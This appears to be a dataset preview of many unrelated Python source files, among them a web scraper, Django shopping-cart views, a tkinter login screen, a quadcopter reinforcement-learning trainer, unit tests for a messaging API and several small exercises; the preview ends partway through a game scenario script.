text stringlengths 8 6.05M |
|---|
'''
define the type assert decorator
'''
from .exception import ArgumentLengthError, ArgumentTypeError
def argument_check(*types):
def check(f):
if len(types) != f.__code__.co_argcount:
raise ArgumentLengthError("type length is not same with function argument count!")
def new_f(*args, **kwds):
for(arg, check_type) in zip(args, types):
if not isinstance(arg, check_type):
raise ArgumentTypeError("the type is not match!")
return f(*args, **kwds)
new_f.__name__ = f.__name__
return new_f
return check |
"""
Scraper for foodnetwork.com. Collectis all recipe links from website.
Author: John Li
"""
from .scraper_base import ScraperBase
from selectolax.parser import HTMLParser
import json
import requests
import string
import re
class FoodNetwork(ScraperBase):
""" Class for scraping recipe links from foodnetwork.com. """
def __init__(self):
""" Default constructor. Mainly sets up parent class. """
with open('../config/base_links.json', 'r') as f:
links = json.load(f)
site = 'foodnetwork'
super().__init__(site, links[site])
def parse(self):
""" Scrapes website for recipe links. """
# how recipe links should look like in regex
pattern = r'.*foodnetwork\.com/recipes/.*\d{7}'
# list or recipes are organized alphabetically on website,
# so just append letters to base link.
page_suffix = list(string.ascii_lowercase)
page_suffix.append('123')
page_suffix.append('xyz')
for suffix in page_suffix:
response = requests.get(self.base_link + suffix)
parser = HTMLParser(response.text)
anchors_nodes = parser.tags('a')
for anchor_node in anchors_nodes:
link = anchor_node.attributes['href'] if 'href' in anchor_node.attributes else ''
if re.fullmatch(pattern, link):
self.links.add('http:' + link)
|
#!/usr/bin/env python
import sys
import argparse
import time
from helpers import parameters as params
from methods import *
def main(args):
outbamfn = args.outBamFile
configReader = params.GetConfigReader()
params.InitConfigReader(args.configfile)
params.SetGainCNV(args.cnvAmpFile)
params.SetLossCNV(args.cnvDelFile)
params.SetCancerType(args.cancerType)
params.SetOutputFileName(args.outBamFile)
params.SetSplitBamsPath(args.splitbams)
results_path = configReader.get('RESULTS', 'results_path')
#set software paths
java_path= bamhelp.GetJavaPath()
beagle_path= bamhelp.GetBeaglePath()
samtools_path = bamhelp.GetSamtoolsPath()
bedtools_path = bamhelp.GetBedtoolsPath()
vcftools_path = bamhelp.GetVCFtoolsPath()
sambamba_path = bamhelp.GetSambambaPath()
params.SetSoftwarePath(java_path, beagle_path,samtools_path, bedtools_path, vcftools_path,sambamba_path)
if( args.phase):
run_pipeline(results_path)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='adds CN spikes to reads, outputs modified reads as .bam along with mates')
parser.add_argument('-outbam', dest='outBamFile', required=True,
help='.bam file name for output')
parser.add_argument('-cnv_amp', dest='cnvAmpFile', required=False,
help='CNV amplification .bed file name')
parser.add_argument('-cnv_del', dest='cnvDelFile', required=False,
help='CNV deletion .bed file name')
parser.add_argument('-inbam', dest='inbamFile', required=False,
help='sam/bam file from which to obtain reads')
parser.add_argument('-cancertype', dest='cancerType', required=False,
help='acronyms for cancer type')
parser.add_argument('-splitbamdir', dest='splitbams', required=False,
help='input bam split by chromosomes')
parser.add_argument('-c', '--configFile', action='store', required=True, dest='configfile',
help='/path/to/config_file.cfg')
parser.add_argument('-phase',dest= 'phase', action="store_true")
args = parser.parse_args()
t0 = time.time()
main(args)
t1 = time.time()
|
#!/usr/bin/env python
import rospy
import smach
import smach_ros
from std_msgs.msg import Int32
from std_msgs.msg import String
import game_setting
import actionlib
from sound_play.msg import SoundRequest, SoundRequestAction, SoundRequestGoal
from watson_developer_cloud import TextToSpeechV1
import roslib; roslib.load_manifest('sound_play')
import os
import json
from sets import Set
class GameSystem:
def __init__(self):
self.pub_rotate = rospy.Publisher('rotate', String, queue_size=10)
self.pub_rotate_result = rospy.Publisher('rotate_result', String, queue_size=10)
self.pub_function = rospy.Publisher('function_card', String, queue_size=10)
self.client = actionlib.SimpleActionClient('sound_play', SoundRequestAction)
self.cards = ['','camera','glasses','helicopter','phone','guitar','axe','kite','crayon','rose','scissors','FrenchFries','skateboard']
self.soundPath = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + "/sysAudio/"
def spin(self):
msg = String()
msg.data = 'X'
self.pub_rotate.publish(msg)
def spin_result(self, state, result):
msg = String()
s = ''
s += state
s += str(result)
msg.data = s
self.pub_rotate_result.publish(msg)
def function_card(self,idx):
# Publish card result to Unity
msg = String()
msg.data = self.cards[idx]
self.pub_function.publish(msg)
rospy.sleep(1.5)
def speak(self, audioPath):
self.client.wait_for_server()
try:
goal = SoundRequestGoal()
goal.sound_request.sound = SoundRequest.PLAY_FILE
goal.sound_request.command = SoundRequest.PLAY_ONCE
goal.sound_request.arg = self.soundPath + audioPath + ".wav"
goal.sound_request.volume = 1.0
self.client.send_goal(goal)
self.client.wait_for_result()
except:
print "print " + audioPath + "fails"
|
import jsonpickle
from django.http import JsonResponse
from django.shortcuts import render, redirect
from django.views import View
from django_redis import get_redis_connection
from goods.models import GoodsSKU
# Create your views here.
class CartAdd(View):
'''加入购物车'''
def post(self, request):
# 判断是否登录
if 'user' not in request.session:
return JsonResponse({'res': 0, 'errmsg': '请先登录'})
user = jsonpickle.loads(request.session.get('user'))
# 获取参数
sku_id = request.POST.get('sku_id')
count = request.POST.get('count')
# 数据校验
if not all([sku_id, count]):
return JsonResponse({'res': 1, 'errmsg': '信息不完整'})
# 验证数字格式
try:
count = int(count)
except Exception as e:
return JsonResponse({'res': 2, 'errmsg': '数目出错'})
# 验证是否有当前商品
try:
sku = GoodsSKU.objects.get(id=sku_id)
except GoodsSKU.DoesNotExist:
return JsonResponse({'res': 3, 'errmsg': '商品不存在'})
# 获取已经存在的商品数目
con = get_redis_connection('default')
cart_key = 'cart_%d' % user.id
cart_count = con.hget(cart_key, sku_id)
# 累计商品数量
if cart_count:
count += int(cart_count)
# 判断库存
if count > sku.stock:
return JsonResponse({'res': 4, 'errmsg': '库存不足'})
# 添加信息
con.hset(cart_key, sku_id, count)
# 获取购物车中商品数量
total_count = con.hlen(cart_key)
return JsonResponse({'res': 5, 'message': '添加成功', 'total_count': total_count})
class CartInfo(View):
'''购物车详情'''
def get(self, request):
# 判断用户是否登录
if 'user' not in request.session:
return redirect('/user/login/')
user = jsonpickle.loads(request.session.get('user'))
# 获取数据库中所有键值对
con = get_redis_connection('default')
cart_key = 'cart_%d' % user.id
cart_dict = con.hgetall(cart_key)
skus = []
total_count = 0
total_price = 0
for sku_id, count in cart_dict.items():
# 获取所有商品
sku = GoodsSKU.objects.get(id=sku_id)
# 处理商品数目格式
count = int(count)
# 计算商品小计
amount = count * sku.price
# 动态添加count对象
sku.count = count
# 动态添加amount对象
sku.amount = amount
skus.append(sku)
# 商品总数量
total_count += count
# 商品总价格
total_price += amount
# 组织上下文
context = {
'skus': skus,
'total_count': total_count,
'total_price': total_price,
}
return render(request, 'cart.html', context)
class CartUpdate(View):
'''购物车添加功能'''
def post(self, request):
if 'user' not in request.session:
return JsonResponse({'res': 0, 'errmsg': '请先登录'})
user = jsonpickle.loads(request.session.get('user'))
sku_id = request.POST.get('sku_id')
count = request.POST.get('count')
if not all([sku_id, count]):
return JsonResponse({'res': 1, 'errmsg': '信息不完整'})
try:
count = int(count)
except Exception as e:
return JsonResponse({'res': 2, 'errmsg': '数目异常'})
try:
sku = GoodsSKU.objects.get(id=sku_id)
except GoodsSKU.DoesNotExist:
return JsonResponse({'res': 3, 'errmsg': '无此商品'})
if count > sku.stock:
return JsonResponse({'res': 4, 'errmsg': '库存不足'})
con = get_redis_connection('default')
cart_key = 'cart_%d' % user.id
con.hset(cart_key, sku_id, count)
return JsonResponse({'res': 5, 'message': '添加成功'})
class CartDelete(View):
'''购物车-删除'''
def post(self, request):
if 'user' not in request.session:
return JsonResponse({'res': 0, 'errmsg': '请先登录'})
user = jsonpickle.loads(request.session.get('user'))
# 接受数据
sku_id = request.POST.get('sku_id')
# 校验数据
if not sku_id:
return JsonResponse({'res': 1, 'errmsg': '无效的商品ID'})
try:
sku = GoodsSKU.objects.get(id=sku_id)
except GoodsSKU.DoesNotExist:
return JsonResponse({'res': 2, 'errmsg': '无此商品'})
con = get_redis_connection('default')
cart_key = 'cart_%d' % user.id
con.hdel(cart_key, sku_id)
return JsonResponse({'res': 3, 'errmsg': '删除成功'})
|
def array123(nums):
i = 2
while i < len(nums):
if nums[i]==3 and nums[i-1]==2 and nums[i-2]==1:
return True
i+=1
return False
def array_front9(nums):
i = 0
while i<len(nums) and i < 4:
if nums[i] == 9:
return True
i+=1
return False
def array_count9(nums):
i = 0
occur = 0
while i < len(nums):
if nums[i]==9:
occur = occur +1
i += 1
return occur
def string_splosion(str):
return string_splosion2(str, 1);
def string_splosion2(str, int):
if len(str) <= int:
return str
return str[0:int]+string_splosion2(str, int+1)
#Codingbat python warmup 2 problems
#Tried BubbleSort
import random
def bubblesort(iarr):
notDone = True
aNum = 0
while notDone:
notDone = False
i=0
while i+1<len(iarr):
if iarr[i]>iarr[i+1]:
aNum = iarr[i]
iarr[i]=iarr[i+1]
iarr[i+1] = aNum
notDone = True
i+=1
print(iarr)
return iarr
integer = 0
array1 = []
while integer < 5:
array1.append(random.randint(0,99))
integer+=1
print(bubblesort(array1)) |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-06-03 23:40
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('userprofiles', '0006_auto_20170521_1919'),
]
operations = [
migrations.AlterField(
model_name='creditcard',
name='due_month',
field=models.CharField(choices=[('01', '01'), ('02', '02'), ('03', '03'), ('04', '04'), ('05', '05'), ('06', '06'), ('07', '07'), ('08', '08'), ('09', '09'), ('10', '10'), ('11', '11'), ('12', '12')], max_length=2, verbose_name='Mes'),
),
migrations.AlterField(
model_name='creditcard',
name='due_year',
field=models.CharField(choices=[('17', '17'), ('18', '18'), ('19', '19'), ('20', '20'), ('21', '21'), ('22', '22'), ('23', '23'), ('24', '24'), ('25', '25'), ('26', '26'), ('27', '27'), ('28', '28'), ('29', '29'), ('30', '30'), ('31', '31'), ('32', '32'), ('33', '33'), ('34', '34'), ('35', '35'), ('36', '36'), ('37', '37'), ('38', '38'), ('39', '39'), ('40', '40'), ('41', '41'), ('42', '42'), ('43', '43'), ('44', '44')], max_length=2, verbose_name='Año'),
),
migrations.AlterField(
model_name='creditcard',
name='number',
field=models.CharField(max_length=19, unique=True, validators=[django.core.validators.RegexValidator('^\\d{1,19}$')], verbose_name='Numero de tarjeta'),
),
migrations.AlterField(
model_name='creditcard',
name='owner',
field=models.CharField(max_length=45, verbose_name='Dueño'),
),
]
|
import unittest
import contracts
from VM import VM
class VNTestCase(unittest.TestCase):
pass
if __name__ == "__main__":
unittest.main()
|
import tkinter as tk
from tkinter import ttk
from tkinter import *
import bcrypt
import sqlite3
from tkinter import messagebox as mb
from MenuPrincipal import Menu
class Ingreso:
def __init__(self, ventanaPrincipal):
self.auxiliar=False
#Creacion de la ventana
self.ventanaLogin = tk.Toplevel(ventanaPrincipal)
self.ventanaLogin.title("Login")
self.ventanaLogin.geometry("400x300")
self.frameTitulo=ttk.Label(self.ventanaLogin, text="Luxury")
#self.frameTitulo.place(x=150, y=15, width=250, height=40)
self.frameTitulo.pack(anchor=CENTER)
self.frameTitulo.config(foreground="black",font=("times",24))
#self.ventanaLogin.configure(bg='black')
self.ventanaLogin.resizable(0,0)
self.center(self.ventanaLogin)
self.labelFrameLogin=ttk.LabelFrame(self.ventanaLogin, text="Login:")
self.labelFrameLogin.place(x=55, y=60, width=300, height=150)
self.labelLogin = tk.Label(self.ventanaLogin, text = "")
self.labelLogin.place(x=90, y=200, width=200, height=105)
#Label Usuario
self.labelUsuario = ttk.Label(self.labelFrameLogin, text="Usuario o Email: ")
self.labelUsuario.grid(column=1, row=1, padx=4, pady=4)
self.labelUsuario.configure(foreground="black")
self.datoUsuario=tk.StringVar()
self.inputUsuario=ttk.Entry(self.labelFrameLogin, width=15, textvariable=self.datoUsuario)
self.inputUsuario.grid(column=2, row=1, padx=4, pady=4)
#Label Pass
self.labelPass = ttk.Label(self.labelFrameLogin, text="Password: ")
self.labelPass.grid(column=1, row=2, padx=4, pady=4)
self.labelPass.configure(foreground="black")
self.datoPassword=tk.StringVar()
self.inputPassword=ttk.Entry(self.labelFrameLogin, width=15, textvariable=self.datoPassword, show="*")
self.inputPassword.grid(column=2, row=2, padx=4, pady=4)
#Boton Ingresar
self.botonIngresar=tk.Button(self.labelFrameLogin, text="Ingresar", command=lambda: self.LogicaLogin(ventanaPrincipal), background="#1BFF00", activebackground="#29DC13")
self.botonIngresar.place(x=40, y=80, width=70, height=40)
#Boton Salir
self.botonSalir=tk.Button(self.labelFrameLogin, text="Salir", command=self.Close_VentanaLogin, background="#FF0000", activebackground="#E91212")
self.botonSalir.place(x=120, y=80, width=70, height=40)
self.ventanaLogin.grab_set()
#self.ventanaLogin.mainloop()
def LogicaLogin(self,ventanaPrincipal):
self.correoInput = self.datoUsuario.get()
self.contraseñaInput = self.datoPassword.get()
self.contraseñaInput = self.contraseñaInput.encode()
self.conexion= sqlite3.connect('empleadosDB.db')
self.cursor=self.conexion.cursor()
self.cursor.execute("SELECT usuario, email, contraseña FROM empleados WHERE usuario=? OR email=?",(self.correoInput, self.correoInput))
self.datos=self.cursor.fetchone()
if(self.datos and ((self.correoInput == self.datos[0] or self.correoInput == self.datos[1]) and bcrypt.checkpw(self.contraseñaInput, self.datos[2]))):
menu = Menu()
#mb.showinfo("Bienvenido", "Bienvenido al sistema de Administracion Hotelera Luxury")
self.ventanaLogin.destroy()
ventanaPrincipal.destroy()
menu.Inicio()
else:
self.labelLogin["text"]="Los datos ingresados son incorrectos"
self.labelLogin.configure(fg="red")
def Close_VentanaLogin(self):
self.ventanaLogin.destroy()
def center(self,win):
win.update_idletasks()
width = win.winfo_width()
height = win.winfo_height()
x = (win.winfo_screenwidth() // 2) - (width // 2)
y = (win.winfo_screenheight() // 2) - (height // 2)
win.geometry('{}x{}+{}+{}'.format(width, height, x, y))
#login = Ingreso()
#login.FrontLogin(" ","") |
base_url = "https://eb-fp-test:8101" # set url |
#!/usr/bin/env python3
import rospy
import time
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import random
import argparse
#from tensorflow import keras
from tensorflow.compat.v1.keras.models import model_from_json, Model,load_model
from tensorflow.compat.v1.keras.models import Sequential
from tensorflow.compat.v1.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.compat.v1.keras.optimizers import Adam
import tensorflow.compat.v1 as tf
import os
import json
import pdb
import argparse
from Replay_Buffer import Replay_Buffer
from Actor_Network import Actor_Network
from Critic_Network import Critic_Network
import tensorflow.compat.v1.keras.backend as K
import myquadcopter_env as environment
tf.disable_v2_behavior()
timestr = time.strftime("%Y%m%d-%H%M%S")
save_path = 'saved_models_' + timestr
def ou_func(x, mu, theta, sigma=0.3):
return theta * (mu - x) + sigma * np.random.randn(1)
def train_quad(debug=True):
env = environment.QuadCopterEnv(debug) # Rohit's custom environment
obs_dim = env.num_states
act_dim = env.num_actions
buffer_size = 5000
batch_size = 32
gamma = 0.98
tau = 0.001
np.random.seed(1337)
vision = False
explore = 1000 #100000
eps_count = 500 #1000
max_steps = 40 #100000
reward = 0
done = False
epsilon = 1
indicator = 0
plot_state = False
plot_reward = True
episode_rewards = []
episode = []
# Configue tensorflow CPU/GPU
config = tf.ConfigProto(
device_count = {'GPU': 0}
)
sess = tf.Session(config=config)
#from tensorflow.keras import backend as K
#K.set_session(sess)
tf.compat.v1.keras.backend.set_session(
sess
)
# Define actor, critic and buffer
actor = Actor_Network(env, sess)
critic = Critic_Network(env, sess)
replay_buffer = Replay_Buffer()
# Save location
save_dir = os.path.join(os.getcwd(), save_path)
if not os.path.isdir(save_dir):
os.makedirs(save_dir)
os.chdir(save_dir)
# Plot total reward
plt.ion()
plt.title('Training Curve')
plt.xlabel('Episodes')
plt.ylabel('Total Reward')
plt.grid()
# Episode loop
for epi in range (eps_count):
# Receive initial observation state
s_t = env.reset() # Initial position info
s_t = np.asarray(s_t)
total_reward = 0
done = False
step = 0
# Step loop
while(done == False):
if step > max_steps: # Episode length is 200 steps
break
step += 1
if debug:
print('--------------------------------')
print('step: {}'.format(step))
loss = 0
epsilon -= 1.0/explore # Reduce every step
a_t = np.zeros([1, act_dim])
noise_t = np.zeros([1, act_dim])
# Select action acoording to current policy and exploration noise
a_t_original = actor.model.predict(s_t.reshape(1, s_t.shape[0]))
print('epsilon: {}'.format(epsilon))
#noise_t[0][0] = max(epsilon,0.0) * ou_func(a_t_original[0][0], 0.0 , 0.60, 1)
#noise_t[0][1] = max(epsilon,0.0) * ou_func(a_t_original[0][1], 0.0 , 0.60, 1)
#noise_t[0][2] = max(epsilon,0.0) * ou_func(a_t_original[0][2], 0.0 , 0.60, 1)
noise_t[0][0] = max(epsilon,0.0) * ou_func(a_t_original[0][0], 0.0 , 0.1, 0.4)
noise_t[0][1] = max(epsilon,0.0) * ou_func(a_t_original[0][1], 0.0 , 0.1, 0.4)
noise_t[0][2] = max(epsilon,0.0) * ou_func(a_t_original[0][2], 0.0 , 0.1, 0.4)
a_t[0][0] = a_t_original[0][0] + noise_t[0][0]
a_t[0][1] = a_t_original[0][1] + noise_t[0][1]
#a_t[0][2] = a_t_original[0][2] + noise_t[0][2]
a_t[0][2] = 0
s_t1, r_t, done, _ = env.step(a_t[0])
s_t1 = np.asarray(s_t1)
# Add current data to replay buffer
replay_buffer.add(s_t, a_t[0], r_t, s_t1, done)
# Sample from replay buffer
batch = replay_buffer.sample_batch()
states = np.asarray([e[0] for e in batch])
actions = np.asarray([e[1] for e in batch])
rewards = np.asarray([e[2] for e in batch])
new_states = np.asarray([e[3] for e in batch])
dones = np.asarray([e[4] for e in batch])
y_t = np.asarray([e[1] for e in batch]) # Just make a empty array has same shape
# Calculate target Q values (What is target Q values)
target_q_values = critic.target_model.predict([new_states, actor.target_model.predict(new_states)])
# y_t is like the label of
for k in range (len(batch)):
if dones[k]:
y_t[k] = rewards[k]
else:
y_t[k] = rewards[k] + gamma*target_q_values[k]
# Train critic model
loss += critic.model.train_on_batch([states, actions], y_t)
a_for_grad = actor.model.predict(states)
grads = critic.gradients(states, a_for_grad)
actor.train(states, grads)
actor.target_train()
critic.target_train()
total_reward += r_t
s_t = s_t1
# One step finish, save models
if ((epi+1)%50 == 0):
a_model_name = '%d_actor_model.h5' %(epi+1)
c_model_name = '%d_critic_model.h5' %(epi+1)
filepath = os.path.join(save_dir, a_model_name)
actor.model.save(a_model_name)
critic.model.save(c_model_name)
print('episode: {}, num_steps: {}, total rewards: {:.2f}, final state: ({:.2f},{:.2f},{:.2f})'.format(epi+1, step, total_reward, s_t[0], s_t[1], s_t[2]))
if plot_reward:
episode_rewards.append(total_reward)
episode.append(epi+1)
plt.plot(episode, episode_rewards, 'b')
plt.pause(0.001)
plt.savefig("Training Curve.png")
import signal, sys
def signal_handler(signal, frame):
reason = 'Because'
rospy.signal_shutdown(reason)
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
if __name__ == "__main__":
rospy.init_node('quad_training', anonymous=True, disable_signals=True)
debug = 1
train_quad(debug)
|
from django.db import models
# Create your models here.
class jobListing(models.Model):
title = models.TextField(null=True,blank=True)
description = models.TextField(null=True,blank=True)
|
# coding: utf-8
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
from made_bitree import TreeNode
class Solution(object):
def isValidBST(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
if not root:
return True
def isValidNode(node):
if not (node.left or node.right):
return node.val, node.val, True
max_ = min_ = node.val
if node.left:
_, max_, valid = isValidNode(node.left)
if not valid:
return None, None, False
elif max_ >= node.val:
print(max_, node.val)
return None, None, False
if node.right:
min_, _, valid = isValidNode(node.right)
if not valid:
return None, None, False
elif min_ <= node.val:
print(min_, node.val)
return None, None, False
max_ = max(max_, node.val)
min_ = min(min_, node.val)
return min_, max_, True
return isValidNode(root)[2]
tree = TreeNode("{10,5,15,#,#,6,20}")
# tree = TreeNode("{5, 14, 1}")
obj = Solution()
print(obj.isValidBST(tree))
|
#!/usr/bin/env python
class HelloWord:
tab = []
def __init__(self):
self.add_tab("Script Python")
self.add_tab("Hello")
self.add_tab("Word")
self.toString()
def add_tab(self, val):
self.tab.append(val)
def toString(self):
print(' '.join(map(str, self.tab)) )
inst = HelloWord()
|
'''
Created on 3Nov.,2016
@author: u76345
'''
import sys
import os
from jetcat2argus import JetCat2Argus
def main():
assert len(sys.argv) == 5, 'Usage: %s <jetcat_path> <db_alias> <db_user> <db_password>' % sys.argv[0]
jetcat_path = sys.argv[1]
db_alias = sys.argv[2]
db_user = sys.argv[3]
db_password = sys.argv[4]
assert os.path.isfile(jetcat_path), '%s is not a valid file' % jetcat_path
j2a = JetCat2Argus(jetcat_path, db_alias, db_user, db_password)
j2a.print_combined_records()
if __name__ == '__main__':
main() |
import random
from datetime import datetime
from unittest import mock, TestCase
import pytest
import responses
from freezegun import freeze_time
from libtrustbridge.websub.repos import NotificationsRepo, DeliveryOutboxRepo, SubscriptionsRepo
from api.models import Message, MessageStatus
from api.use_cases import (
PublishStatusChangeUseCase, DispatchMessageToSubscribersUseCase, DeliverCallbackUseCase, NewMessagesNotifyUseCase
)
class TestGetNewMessagesUseCase:
@pytest.fixture(autouse=True)
def message(self, request, db_session, clean_channel_repo, clean_notifications_repo):
self.db_session = db_session
self.message1 = Message(payload={"receiver": "AU"})
self.message2 = Message(payload={"receiver": "AU"})
with freeze_time('2020-06-17 12:04:01.111111'):
messages = [
self.message1,
self.message2,
Message(payload={"receiver": "SG"}),
]
for m in messages:
self.db_session.add(m)
self.db_session.commit()
with freeze_time('2020-06-17 12:04:03.111111'):
messages = [
Message(payload={"receiver": "SG"}),
]
for m in messages:
self.db_session.add(m)
self.message1.status = MessageStatus.REVOKED
self.db_session.commit()
self.channel_repo = clean_channel_repo
self.notifications_repo = clean_notifications_repo
self.use_case = NewMessagesNotifyUseCase('AU', clean_channel_repo, clean_notifications_repo)
def test_get_new_messages__when_available__should_return_them(self):
now = datetime(2020, 6, 17, 12, 4, 1, 222222)
messages = self.use_case.get_new_messages(receiver='AU', since=now)
assert len(messages) == 1
assert messages[0].updated_at >= now
assert messages[0].id == self.message1.id
def test_set_last_updated__should_set_timestamp_into_channel_repo(self):
updated_at = datetime(2020, 6, 17, 11, 34, 56, 123456)
self.use_case.set_last_updated_at(updated_at)
assert self.use_case.get_last_updated_at() == updated_at
assert self.channel_repo.get_object_content('updated_at') == b'2020-06-17T11:34:56.123456'
def test_get_last_updated_at__when_not_available__should_return_none(self):
assert self.use_case.get_last_updated_at() is None
def test_execute__for_each_new_message__should_publish_notification(self):
now = datetime(2020, 6, 17, 12, 4, 1, 222222)
self.use_case.set_last_updated_at(now)
self.use_case.execute()
notification = self.notifications_repo.get_job()
assert notification and notification[1] == {'content': {'id': self.message1.id}, 'topic': 'jurisdiction.AU'}
assert not self.notifications_repo.get_job()
def test_execute__when_no_last_updated_at__should_use_now(self):
with mock.patch('api.use_cases.datetime') as mocked_datetime:
mocked_datetime.utcnow.return_value = datetime(2020, 6, 17, 12, 1, 1, 222222)
self.use_case.execute()
notification = self.notifications_repo.get_job()
notification2 = self.notifications_repo.get_job()
assert notification and notification[1] == {'content': {'id': self.message2.id}, 'topic': 'jurisdiction.AU'}
assert notification2 and notification2[1] == {'content': {'id': self.message1.id}, 'topic': 'jurisdiction.AU'}
assert not self.notifications_repo.get_job()
class TestPublishStatusChangeUseCase:
def test_use_case__should_send_message_to_notification_queue(self):
notifications_repo = mock.create_autospec(NotificationsRepo).return_value
message = Message(id=24, status=MessageStatus.CONFIRMED, payload={'sender': 'CN'})
PublishStatusChangeUseCase(notifications_repo).publish(message=message)
notifications_repo.post_job.assert_called_once_with({
'topic': '24',
'content': {
'id': 24
}
})
class TestDispatchMessageToSubscribersUseCase(TestCase):
def setUp(self):
self.notifications_repo = mock.create_autospec(NotificationsRepo).return_value
self.notifications_repo.get_job.return_value = (
'msg_id', {'topic': 'message.24.status', 'content': {'id': 24}}
)
self.subscriptions_repo = mock.create_autospec(SubscriptionsRepo).return_value
self.subscription1 = mock.Mock(callback_url='http://callback.url/1')
self.subscription2 = mock.Mock(callback_url='http://callback.url/2')
self.subscriptions_repo.get_subscriptions_by_pattern.return_value = {
self.subscription1,
self.subscription2,
}
self.delivery_outbox_repo = mock.create_autospec(DeliveryOutboxRepo).return_value
self.use_case = DispatchMessageToSubscribersUseCase(
self.notifications_repo, self.delivery_outbox_repo, self.subscriptions_repo
)
def test_use_case__given_notification__should_post_job_to_outbox_for_each_related_subscribers(self):
self.use_case.execute()
calls = self.delivery_outbox_repo.mock_calls
assert mock.call.post_job({'s': 'http://callback.url/1', 'payload': {'id': 24}}) in calls
assert mock.call.post_job({'s': 'http://callback.url/2', 'payload': {'id': 24}}) in calls
assert self.subscriptions_repo.get_subscriptions_by_pattern.assert_called_once_with
def test_use_case__when_no_subscribers_should_not_post(self):
self.subscriptions_repo.get_subscriptions_by_pattern.return_value = set()
self.use_case.execute()
assert not self.delivery_outbox_repo.called
def test_use_case__when_no_notifications__should_not_post(self):
self.notifications_repo.get_job.return_value = False
self.use_case.execute()
assert not self.delivery_outbox_repo.called
def test_use_case_when_subscription_not_valid__should_not_post_it(self):
self.subscription1.is_valid = False
self.use_case.execute()
self.delivery_outbox_repo.post_job.assert_called_once_with({'s': 'http://callback.url/2', 'payload': {'id': 24}})
class TestDeliverCallbackUseCase(TestCase):
def setUp(self):
self.job = {'s': 'http://callback.url/1', 'payload': {'id': 55}}
self.delivery_outbox_repo = mock.create_autospec(DeliveryOutboxRepo).return_value
self.delivery_outbox_repo.get_job.return_value = 'queue_id', self.job
self.use_case = DeliverCallbackUseCase(self.delivery_outbox_repo, 'https://channel.url/hub')
random.seed(300)
@responses.activate
def test_use_case__given_deliverable__should_send_request(self):
responses.add(responses.POST, 'http://callback.url/1', status=202)
self.use_case.execute()
assert len(responses.calls) == 1
request = responses.calls[0].request
assert request.url == 'http://callback.url/1'
assert request.headers['Link'] == '<https://channel.url/hub>; rel="hub"'
assert request.body == b'{"id": 55}'
assert not self.delivery_outbox_repo.post_job.called
self.delivery_outbox_repo.delete.assert_called_once_with('queue_id')
@responses.activate
def test_use_case__when_callback_not_valid__should_retry(self):
responses.add(responses.POST, 'http://callback.url/1', status=400)
self.use_case.execute()
new_job = {'payload': {'id': 55}, 's': 'http://callback.url/1', 'retry': 2}
self.delivery_outbox_repo.post_job.assert_called_once_with(new_job, delay_seconds=12)
self.delivery_outbox_repo.delete.assert_called_once_with('queue_id')
@responses.activate
def test_use_case__when_max_retry_attempts_reached__should_not_retry(self):
self.job['retry'] = 3
responses.add(responses.POST, 'http://callback.url/1', status=400)
self.use_case.execute()
self.delivery_outbox_repo.delete.assert_called_once_with('queue_id')
assert not self.delivery_outbox_repo.post_job.called
|
import os
import h5py
def loadh5(dump_file_full_name):
''' Loads a h5 file as dictionary '''
with h5py.File(dump_file_full_name, 'r') as h5file:
dict_from_file = readh5(h5file)
return dict_from_file
def readh5(h5node):
''' Recursive function to read h5 nodes as dictionary '''
dict_from_file = {}
for _key in h5node.keys():
if isinstance(h5node[_key], h5py._hl.group.Group):
dict_from_file[_key] = readh5(h5node[_key])
else:
dict_from_file[_key] = h5node[_key].value
return dict_from_file
|
import sys
grade = float(sys.argv[1])
if (grade < 0 or grade > 5):
print("Program expects a number from 0-5.")
elif grade < 1.0:
print("F")
elif grade < 1.5:
print("D-")
elif grade < 2.0:
print("D")
elif grade < 2.5:
print("D+")
elif grade < 2.85:
print("C-")
elif grade < 3.2:
print("C")
elif grade < 3.5:
print("C+")
elif grade < 3.85:
print("B-")
elif grade < 4.2:
print("B")
elif grade < 4.5:
print("B")
elif grade < 4.7:
print ("A-")
elif grade < 4.85:
print("A")
else:
print("A+")
|
from ED6ScenarioHelper import *
def main():
# 蔡斯
CreateScenaFile(
FileName = 'R3102_1 ._SN',
MapName = 'Zeiss',
Location = 'R3102.x',
MapIndex = 1,
MapDefaultBGM = "ed60010",
Flags = 0,
EntryFunctionIndex = 0xFFFF,
Reserved = 0,
IncludedScenario = [
'',
'',
'',
'',
'',
'',
'',
''
],
)
BuildStringList(
'@FileName', # 8
)
DeclEntryPoint(
Unknown_00 = 0,
Unknown_04 = 0,
Unknown_08 = 6000,
Unknown_0C = 4,
Unknown_0E = 0,
Unknown_10 = 0,
Unknown_14 = 9500,
Unknown_18 = -10000,
Unknown_1C = 0,
Unknown_20 = 0,
Unknown_24 = 0,
Unknown_28 = 2800,
Unknown_2C = 262,
Unknown_30 = 45,
Unknown_32 = 0,
Unknown_34 = 360,
Unknown_36 = 0,
Unknown_38 = 0,
Unknown_3A = 144,
InitScenaIndex = 0,
InitFunctionIndex = 0,
EntryScenaIndex = 0,
EntryFunctionIndex = 1,
)
ScpFunction(
"Function_0_AA", # 00, 0
"Function_1_AB", # 01, 1
"Function_2_AC", # 02, 2
"Function_3_1CD1", # 03, 3
"Function_4_24EF", # 04, 4
"Function_5_2504", # 05, 5
"Function_6_2519", # 06, 6
"Function_7_2561", # 07, 7
"Function_8_2576", # 08, 8
"Function_9_258B", # 09, 9
"Function_10_25A0", # 0A, 10
"Function_11_25E8", # 0B, 11
"Function_12_2630", # 0C, 12
"Function_13_2678", # 0D, 13
"Function_14_26BC", # 0E, 14
"Function_15_26FA", # 0F, 15
"Function_16_273F", # 10, 16
"Function_17_27CE", # 11, 17
"Function_18_27EA", # 12, 18
"Function_19_2810", # 13, 19
"Function_20_2836", # 14, 20
"Function_21_2852", # 15, 21
"Function_22_288F", # 16, 22
)
def Function_0_AA(): pass
label("Function_0_AA")
Return()
# Function_0_AA end
def Function_1_AB(): pass
label("Function_1_AB")
Return()
# Function_1_AB end
def Function_2_AC(): pass
label("Function_2_AC")
